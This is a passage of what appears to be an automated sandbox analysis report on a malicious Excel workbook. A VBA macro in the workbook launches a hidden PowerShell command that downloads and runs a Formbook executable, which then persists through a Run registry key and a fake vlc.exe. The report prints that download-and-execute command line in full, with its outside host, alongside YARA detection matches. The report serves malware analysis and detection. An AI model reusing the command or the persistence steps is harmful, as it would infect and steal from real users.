Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304CD4 29_2_01304CD4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A1FF1 29_2_013A1FF1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013967E2 29_2_013967E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013ADFCE 29_2_013ADFCE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F6E30 29_2_012F6E30
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139D616 29_2_0139D616
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F5600 29_2_012F5600
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0135AE60 29_2_0135AE60
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01381EB6 29_2_01381EB6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A2EF7 29_2_013A2EF7
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00401030 30_2_00401030
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041D96D 30_2_0041D96D
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041DAB1 30_2_0041DAB1
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041DCBF 30_2_0041DCBF
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00402D88 30_2_00402D88
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00402D90 30_2_00402D90
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00409E40 30_2_00409E40
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00409E3B 30_2_00409E3B
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041DF98 30_2_0041DF98
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CFA3 30_2_0041CFA3
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00402FB0 30_2_00402FB0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01344120 30_2_01344120
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0132F900 30_2_0132F900
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013499BF 30_2_013499BF
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0134A830 30_2_0134A830
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013FE824 30_2_013FE824
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E1002 30_2_013E1002
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013520A0 30_2_013520A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F20A8 30_2_013F20A8
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0133B090 30_2_0133B090
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F28EC 30_2_013F28EC
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F2B28 30_2_013F2B28
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0134A309 30_2_0134A309
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0134AB40 30_2_0134AB40
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0135EBB0 30_2_0135EBB0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013D23E3 30_2_013D23E3
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E03DA 30_2_013E03DA
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013EDBD2 30_2_013EDBD2
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0135ABD8 30_2_0135ABD8
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013DFA2B 30_2_013DFA2B
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F22AE 30_2_013F22AE
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E4AEF 30_2_013E4AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01320D20 30_2_01320D20
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F2D07 30_2_013F2D07
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F1D55 30_2_013F1D55
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01352581 30_2_01352581
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E2D82 30_2_013E2D82
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0133D5E0 30_2_0133D5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F25DD 30_2_013F25DD
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0133841F 30_2_0133841F
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013ED466 30_2_013ED466
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E4496 30_2_013E4496
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F1FF1 30_2_013F1FF1
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013FDFCE 30_2_013FDFCE
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01346E30 30_2_01346E30
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013ED616 30_2_013ED616
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F2EF7 30_2_013F2EF7
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 5901777.xls OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Document contains embedded VBA macros
Source: 5901777.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0041BBE0 appears 38 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0132D08C appears 48 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 012DB150 appears 159 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 01365720 appears 85 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0132B150 appears 133 times
PE file contains strange resources
Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 5901777.xls, type: SAMPLE Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: oftmhayq.exe.20.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vlc.exe.25.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winXLS@16/12@2/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{3E27D0C2-EB48-412A-8CE4-AD42CAD017F3} - OProcSessId.dat
Source: 5901777.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\Public\oftmhayq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 5901777.xls Virustotal: Detection: 23%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
Source: unknown Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: wntdll.pdbUGP source: oftmhayq.exe, 0000001D.00000002.535167655.00000000013CF000.00000040.00000001.sdmp, oftmhayq.exe, 0000001E.00000002.487705412.000000000141F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: oftmhayq.exe

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730EB90 pushad ; ret 24_2_0730EBAA
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730219F push E9000001h; ret 24_2_073021A4
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BE219F push E9000001h; ret 25_2_07BE21A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_004178AD push 00000001h; retf 29_2_0041796C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_004172D7 push edi; retf 29_2_004172DA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419D5A push ebp; iretd 29_2_00419D5E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0040D695 push esp; ret 29_2_0040D699
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CEB5 push eax; ret 29_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CF6C push eax; ret 29_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CF02 push eax; ret 29_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CF0B push eax; ret 29_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0132D0D1 push ecx; ret 29_2_0132D0E4
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_004178AD push 00000001h; retf 30_2_0041796C
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_004172D7 push edi; retf 30_2_004172DA
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419D5A push ebp; iretd 30_2_00419D5E
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0040D695 push esp; ret 30_2_0040D699
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CEB5 push eax; ret 30_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CF6C push eax; ret 30_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CF02 push eax; ret 30_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CF0B push eax; ret 30_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0137D0D1 push ecx; ret 30_2_0137D0E4
Source: initial sample Static PE information: section name: .text entropy: 7.97600028112

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe
Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe
Stores files to the Windows start menu directory
Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN
Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
Source: C:\Users\Public\oftmhayq.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
